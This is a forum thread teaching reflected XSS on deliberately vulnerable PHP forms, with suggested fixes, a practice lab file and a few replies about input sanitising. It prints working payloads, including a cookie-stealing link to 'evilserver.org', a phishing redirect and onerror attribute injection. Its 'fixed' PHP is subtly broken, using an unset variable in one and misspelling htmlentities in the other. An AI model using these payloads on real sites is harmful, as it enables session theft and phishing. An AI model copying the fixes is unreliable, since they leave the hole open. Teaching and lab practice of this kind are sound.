Guide to XSS (Examples included)
#1
There are many instances of theory tutorials on the internet but very few real life examples. I have intentions to write tutorials that allow for users to understand certain exploits, including how and why they happen. It is in this work that I hope to inspire users to want to learn more and dig deeper. This is XSS.
I assume at this point you have a loose understanding of what cross site scripting actually is, if you don't please refer to my general hacking guide here
XSS in User Input
This is the holy grail of XSS that one could find in the wild. Filterless user input. This is a license to do anything to the front end of a page.
This is our HTML and PHP. Normally there would be some more actual PHP going on here but I left it fairly simple for this example.
Code:
<h1>User input</h1>
<form method="get">
<input type="text" name="xss1">
<input type="submit" value="Submit Search">
</form>
<?php
      if (isset($_GET['xss1'])) {
        echo 'You entered "' . $_GET['xss1'] . '"';
      }
    ?>
Let's start by seeing how the form reacts naturally without any hackery of any kind.
[Image: WTURnJ1.png]
We entered the word "test" getting a very simple result. A result like this is very common in empty result pages on searches e.x. "Your search term 'Cat Photos' was not found"
Now my first thing that I like to do to test to see if user input is vulnerable, is to input simple html. In this case I used the bold HTML tag <b>.
[Image: OMnWizk.png]
Ah-ha! It seems that who ever coded the search did not take the time to sanitize the user input. This means our HTML presented to the user looks something like...
Code:
<h1>User input</h1>
<form method="get">
<input type="text" name="xss1">
<input type="submit" value="Submit Search">
</form>
You entered "<b>HTML elements input</b>"
All that is left now is to actually make this an XSS attack by inserting some real javascript.
For our input we will enter some simple JS like...
Code:
<script>alert('xss');</script>
[Image: wK24BJc.png]
Ding ding, now we know 100% that we can run JS. At this point the HTML presented to the end user looks something like this.
Code:
<h1>User input</h1>
<form method="get">
<input type="text" name="xss1">
<input type="submit" value="Submit Search">
</form>
You entered "<script>alert('xss');</script>"
Since the form we were exploiting uses "GET" (Like most search forms) we can actually send our link with malicious JS to do things like steal cookies or redirect them to phishing sites. Examples...
Code:
// Alert XSS
http://localhost/exploits/xss.php?xss1=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E
// Cookie stealer using get variables
http://localhost/exploits/xss.php?xss1=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fwww.evilserver.org%2Fcookie-stealer.php%3Fc%3D%22+%2B+document.cookie%3B%3C%2Fscript%3E
// Redirect to phishing site
http://localhost/exploits/xss.php?xss1=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fphishingsite-evil.com%22%3B%3C%2Fscript%3E
Now how can this code be fixed? Simple, filter the user input...
Code:
<h1>User input</h1>
<form method="get">
<input type="text" name="xss1">
<input type="submit" value="Submit Search">
</form>
<?php
      if (isset($_GET['xss1'])) {
        $input = htmlentities($input);
        echo 'You entered "' . $input . '"';
      }
    ?>
XSS in Dynamic HTML Tags
Sometimes in a XSS vuln we don't always have the ability to just use script tags. Sometimes it requires users to get creative. This example is meant to emulate somethings like a bad BB code (like [img]).
Code:
<h1>Load image</h1>
<form method="get">
<input type="text" name="xss2">
<input type="submit" value="Submit Search">
</form>
<?php
      if (isset($_GET['xss2'])) {
        echo 'Removed all HTML...<br>';
        echo 'Loading image...<br>';
        echo '<img src="' . strip_tags($_GET['xss2']) . '">';
      }
    ?>
So let's see what happens when we use some normal input...
[Image: FTyoDre.png]
So based on the code and the warning supplied to the user things like script tags and other HTML bits are being stripped out...
Let's see how much we can affect the input though...
Let's try entering the following..
Code:
example.com/404.jpg" foo="bar
[Image: J06fnMN.png]
Fantastic, it seem that we are able to use a double quote to escape the image tag's "src" attribute. Even more so we are able to create new attributes. If that does seem awesome to you read up on this document. http://www.w3schools.com/tags/ref_eventattributes.asp
With this knowledge we can now actually execute some javascript. Let's input the following...
Code:
example.com/404.jpg" onerror="alert('xss')
[Image: uZwRk5s.png]
Huzzaah. Take that horribly insecure BB code system. We now have a successful XSS. As perusual this can be used in all sorts of different ways.
How can this be fixed? We have a two issues, non valid image urls can be inputed and the src attribute can be escaped. This can be done with a regular expression(Example), but in this case we will simply just use htmlentites. This will treat characters like the double quote and equal sign like any other character.
Code:
<h1>Load image</h1>
<form method="get">
<input type="text" name="xss2">
<input type="submit" value="Submit Search">
</form>
<?php
      if (isset($_GET['xss2'])) {
        echo 'Removed all HTML...<br>';
        echo 'Loading image...<br>';
        echo '<img src="' . htmlentites($_GET['xss2']) . '">';
      }
    ?>
XSS in templates (Home work)
Please use the below code to create this on a real environment and attempt to exploit the third form. It should be pretty simple. Good luck.
Code:
<?php

?>
<html>
<head>
<title>XSS Exploit examples</title>
</head>
<body>
<h1>User input</h1>
<form method="get">
<input type="text" name="xss1">
<input type="submit" value="Submit Search">
</form>
<?php
      if (isset($_GET['xss1'])) {
        echo 'You entered "' . $_GET['xss1'] . '"';
      }
    ?>
<hr>
<h1>Load image</h1>
<form method="get">
<input type="text" name="xss2">
<input type="submit" value="Submit Search">
</form>
<?php
      if (isset($_GET['xss2'])) {
        echo 'Removed all HTML...<br>';
        echo 'Loading image...<br>';
        echo '<img src="' . strip_tags($_GET['xss2']) . '">';
      }
    ?>
<hr>
<h1>Template system</h1>
<?php
      if (isset($_GET['template'])) {
        $colors = array(
          'black',
          'red',
          'blue',
          'yellow',
        );
        if (in_array($_GET['template'], $colors)) {
          echo '<style>html { background: ' . $_GET['template'] . ';}</style>';
        }
        else {
          echo 'Color "' . $_GET['template'] . '" not found';
        }
      }
    ?>
</body>
</html>
Reply
#2
Simple but gets to the point.
Only thing I can recommend is talking about all the types of XSS.
Reply
#3
The use of htmlspecialchars another way to stop this kind of attack. You could use ctype_alnum to only allow alphanumeric input.
Reply
#4
i like to take input and rub it in your face:

Code:
$ratAxe = trim(html_entity_decode($_POST["message"], ENT_QUOTES, 'utf-8'));
$ratAxe = html_entity_decode($ratAxe, ENT_QUOTES, 'utf-8');
echo htmlentities(html_entity_decode($ratAxe, ENT_QUOTES, 'utf-8'), ENT_QUOTES, 'utf-8');

output:
[code[hello, <script>alert('test');</script>, welcome to my site![/code]

sometimes you have to decode it thrice to clean up partially encoded input.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Phishing Disruption Guide DeepLogic 7 2,972 06-25-2020, 08:18 PM
Last Post: DeepLogic
  [Tutorial] XSS through Exif headers Insider 1 1,205 06-16-2020, 11:51 AM
Last Post: LaZr4us
  [PoC] RunBox.com x MailChimp.com - Stored XSS Vulnerabilities (Bug Bounty Hunting) Daisuke Dan 3 6,390 04-24-2019, 08:47 PM
Last Post: thunder
  Exploiting Reflective XSS (Post) Insider 1 4,675 04-24-2019, 08:32 PM
Last Post: thunder